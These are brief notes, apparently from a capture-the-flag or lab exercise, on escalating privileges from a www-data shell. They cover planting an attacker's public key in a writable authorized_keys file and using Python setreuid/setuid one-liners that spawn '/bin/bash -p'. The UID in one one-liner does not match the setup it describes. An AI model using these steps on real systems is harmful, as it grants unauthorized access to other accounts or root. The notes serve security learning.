PoC in video format: https://youtu.be/xLb2wo66Xr0
- using public key authentication technique to escape
-check the .ssh if we have write permission on authorized_keys
-write our own public key into the authorized_keys file
-ssh into the user with our own private key
//notes: the public-private key pair can be generated using ssh-keygen
- using python to setreuid to escape
current setup:
euid user: 1000(Eve)
uid user: 33 (www-data)
rough idea how it works executing step by step:
$python
>>import os
>>os.setreuid(1000,1000) #setreuid(ruid,euid)
>>os.system("/bin/bash -p")
one line command:
python -c 'import os;os.setreuid(1001,1001);os.system("/bin/bash -p")'
- can use the normal euid user public key authentication technique
- use python to setuid & escape EUID limited shell
rough idea how it works executing step by step:
#python
>>import os
>>os.setuid(0)
>>os.system("/bin/bash -p")
one line command:
python -c 'import os;os.setuid(0);os.system("/bin/bash -p")'